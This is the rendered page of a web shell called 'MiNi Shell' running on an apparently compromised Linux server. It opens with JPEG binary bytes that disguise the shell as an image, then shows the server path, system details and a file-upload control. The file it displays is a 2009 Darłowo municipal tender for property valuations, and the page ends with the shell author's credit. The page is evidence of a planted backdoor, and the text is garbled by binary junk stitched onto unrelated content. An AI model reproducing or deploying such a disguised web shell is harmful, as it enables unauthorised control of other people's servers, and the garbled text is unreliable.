JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/8893-N-2009.html

<p class="kh_header"><b>Darłowo: Wykonywanie w 2009 r., na terenie Gminy Miasto Darłowo wycen nieruchomości 
(8 zadań) oraz potwierdzanie aktualności operatów szacunkowych w okresie 
24 miesięcy od daty ich sporządzenia.</b><br>
<b>Numer ogłoszenia: 8893 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Darłowie , Plac Tadeusza Kościuszki 9, 76-150 Darłowo, woj. zachodniopomorskie, tel. 094 3142223 w. 231, faks 094 3142333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie w 2009 r., na terenie Gminy Miasto Darłowo wycen nieruchomości 
(8 zadań) oraz potwierdzanie aktualności operatów szacunkowych w okresie 
24 miesięcy od daty ich sporządzenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonywanie w 2009 r., na potrzeby Gminy Miasto Darłowo wycen nieruchomości 
(8 zadań) oraz potwierdzanie aktualności operatów szacunkowych w okresie 
24 miesięcy od daty ich sporządzenia. 
Zakres zamówienia obejmuje:
- wycenę działek gruntu,
- wycenę działek gruntu do opłat adiacenckich,
- wycenę nieruchomości zabudowanych,
- wycenę lokali mieszkalnych lub użytkowych z pomieszczeniami przynależnymi  
   i określeniem wartości ułamkowej części prawa do gruntu,
- wycenę lokali mieszkalnych lub użytkowych bez pomieszczeń przynależnych 
   i określeniem wartości ułamkowej części prawa do gruntu,
- wycenę pomieszczeń gospodarczych przynależnych do lokali i określeniem
   wartości ułamkowej części prawa do gruntu,
- wycenę działek  gruntu celem przekształcenia prawa użytkowania wieczystego 
   w prawo własności w myśl ustawy z dnia 29 lipca 2005 r. o przekształceniu
   prawa użytkowania wieczystego w prawo własności nieruchomości,
- ustalanie wzrostu wartości nieruchomości, w celu naliczenia jednorazowej opłaty
   ustalonej w miejscowym planie zagospodarowania przestrzennego miasta
   Darłowo, w myśl art.36 ust.4 ustawy z dnia 27 marca 2003 r.  o planowaniu  
   i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz.717 z dnia 10 maja 2003 r.),
- potwierdzanie aktualności operatów szacunkowych na wyżej okreslone zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.01-.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.02.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu przetargowym Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Wykonawca biorący udział w przetargu nie może podlegać wykluczeniu 
   z ubiegania się o udzielenie zamówienia publicznego na mocy art. 24, ust. 1 
   i ust. 2 ustawy Prawo zamówień publicznych,
2.Wykonawca zobowiązany jest spełnić warunki zawarte w art. 22 ust. 1 ustawy
   Prawo zamówień publicznych, 
3.Wykonawca zobowiązany jest udokumentować, że dysponuje kadrą 
   z doświadczeniem w wycenach nieruchomości. Należy udokumentować, że
   pracownicy, którymi dysponuje Wykonawca, wykonywali z właściwą
   starannością minimum dla jednego Zamawiającego wyceny nieruchomości 
   - w okresie ostatnich pięciu lat - poparte stosownymi referencjami - minimum     
      jedna referencja.
 UWAGA!
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły (spełnia - nie spełnia), w oparciu o informacje zawarte w dokumentach 
i oświadczeniach (wymaganych przez Zamawiającego i podanych w S.I.W.Z.) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.

Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnianie warunków udziału 
w postępowaniu lub, którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie chyba, że mimo uzupełnienia konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać:
1.Nazwę Wykonawcy, adres, numer telefonu, numer faksu, datę sporządzenia 
   oferty.
2.Określenie przedmiotu oferty obejmujące całość zamówienia publicznego lub
   wybrane przez oferenta zadania określone w ppkt. 3.1. S.I.W.Z.  jako zadania:
         Nr 1, Nr 2, Nr 3, Nr 4, Nr 5, Nr 6, Nr 7, Nr 8.
3.Cenę umowną brutto za wykonanie poszczególnych (wybranych) zadań 
   przedmiotu zamówienia określonego w ppkt. 3.1. S.I.W.Z.  opisanych jako 
   zadania: Nr 1, Nr 2,Nr 3, Nr 4, Nr 5, Nr 6, Nr 7, Nr 8.
4.Oświadczenie Wykonawcy, że nie podlega wykluczeniu z ubiegania się 
   o udzielenie zamówienia publicznego, na mocy art. 24, ust.1 i ust. 2 pkt. 1
   ustawy Prawo zamówień publicznych.
5.Oświadczenie Wykonawcy, że spełnia warunki zawarte w art. 22 ust.1 pkt 1,
   pkt 2 i pkt 3 ustawy Prawo zamówień publicznych.
6.Oświadczenie Wykonawcy, że zapoznał się ze Specyfikacją istotnych warunków
   zamówienia i ją akceptuje.
7.Oświadczenie Wykonawcy, że zobowiązuje się do podpisania umowy na 
  warunkach podanych w projekcie umowy.
8.Oświadczenie Wykonawcy, że akceptuje podany w S.I.W.Z. termin związania
   złożoną ofertą.
9.Oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu    
   określone w pkt. 8  S.I.W.Z.
10.Oświadczenie Wykonawcy, że przyjmuje określony przez Zamawiającego 
    w ppkt. 21.2 S.I.W.Z. sposób wynagradzania za potwierdzanie aktualności
    operatów szacunkowych.
11.Oświadczenie Wykonawcy, że przyjmuje określone przez Zamawiającego 
    w ppkt.  7.3. S.I.W.Z. terminy wykonania wycen na poszczególne zadania.
12. Informację o Wykonawcy z ostatnich trzech lat, a w przypadku gdy okres
     prowadzenia działalności jest krótszy - z tego okresu - określającą ilość lat
     funkcjonowania na rynku, profil prowadzonej działalności gospodarczej,
     przeciętną liczbę zatrudnionych pracowników oraz liczebność personelu
     kierowniczego.
13.Wykaz imienny osób, które będą wykonywać zamówienie z podaniem ich
     doświadczenia i kwalifikacji zawodowych oraz kserokopie uprawnień
     wymaganych prawem niezbędnych do realizacji przedmiotu zamówienia, 
     a także zaświadczenia o przynależności do stosownych Izb.
14.Wykaz wykonanych w okresie ostatnich trzech lat zadań, a jeżeli okres
     prowadzenia działalności gospodarczej jest krótszy niż trzy lata - to z tego
     okresu - odpowiadających swoim rodzajem usługom stanowiących przedmiot
     zamówienia. Należy sporządzić w formie tabeli z podaniem nazwy zamówienia,
     zakresu wykonanych robót, wartości, nazwy Zamawiającego, roku wykonania) 
     - popartych stosownymi referencjami - minimum jedna referencja.
15.Wszystkie wymagane dokumenty wymienione w pkt. 19 niniejszej S.I.W.Z.

Wykaz dokumentów, które musi zawierać oferta:
1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
   ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu
   do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego
   nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
   o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo
   składania ofert.
2.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz
   właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
   Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca
   nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie
   zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem
   zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie
   w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej
   niż 3  miesiące przed upływem terminu składania wniosków o dopuszczenie do
   udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3.Aktualną polisę ubezpieczenia OC odpowiedzialności cywilnej rzeczoznawcy
   majątkowego. 
Do oferty należy załączyć w/w dokumenty w formie oryginałów lub kserokopii. Załączone do oferty kserokopie w/w dokumentów winny być potwierdzone za zgodność z oryginałem przez osoby upoważnione przez Wykonawcę.
Uwaga!!!	W przypadku złożenia oferty przez Wykonawców występujących wspólnie, poszczególni Wykonawcy składają w ofercie poszczególne dokumenty analogicznie oraz dołączają oświadczenie, że w przypadku uzyskania zamówienia poniosą wspólnie solidarną odpowiedzialność za niewykonanie lub nienależyte jego wykonanie, podpisane przez wszystkich Wykonawców występujących wspólnie. 
Wykonawcy występujący wspólnie o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
4.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
   Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 19.1
   i 19.2 S.I.W.Z.;
4.1) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę
       lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenia społeczne 
    i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub
    rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania
    decyzji właściwego organu;
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
4.2) składa zaświadczenie właściwego organu sądowego lub administracyjnego
      kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, 
      w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy.
5. Dokumenty, o których mowa w pkt. 19.4.1. lit. a, c oraz pkt. 19.4.2. S.I.W.Z.
    powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
    składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie
    zamówienia albo składania ofert.
6. Dokumenty, o których mowa w pkt. 19.4.1. lit. b S.I.W.Z., powinny być
    wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania
    wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia
    albo składania ofert.
7. Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę
    lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa 
    pkt. 19.4.1. S.I.W.Z., zastępuje się je dokumentem zawierającym oświadczenie
    złożone przed notariuszem, właściwym organem sądowym, administracyjnym
    albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju
    pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce
    zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.darlowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
76 -150 Darłowo
Plac Tadeusza Kościuszki 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2009 godzina 10:30, miejsce: Urząd Miejski
w Darłowie 
Plac Tadeusza Kościuszki 9
sekretariat - pokój 21 (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Charakterstyka ofert częściowych opisana jest: 
- w pkt 3 S.I.W.Z. 
- oraz w dziale II.1.3. ogłoszenia o zamówieniu
   publicznym..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacuje się zlecenie:
- wycen około: 300 działek gruntu, 50 działek gruntu do opłat adiacenckich, 
  100 nieruchomosci zabudowanych, 20 lokali mieszkalnych,10 pomieszczeń
  gospodarczych, 50 działek gruntu celem przekształcenia uzytkowania wieczystego 
  na własność;
- ustalenia wzrostu wartości dla około 20 nieruchomości w celu naliczenia
   jednorazowej opłaty ustalonej w miejscowym planie zagospodarowania
   przestrzennego;
- potwierdzenia około 150 wykonanych operatów szacunkowych. 
Łącznie szacuje się, że wartość udzielonych zleceń wyniesie około - 100.000,00 zł brutto, czyli łącznie z podatkiem VAT..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.01-.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.02.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com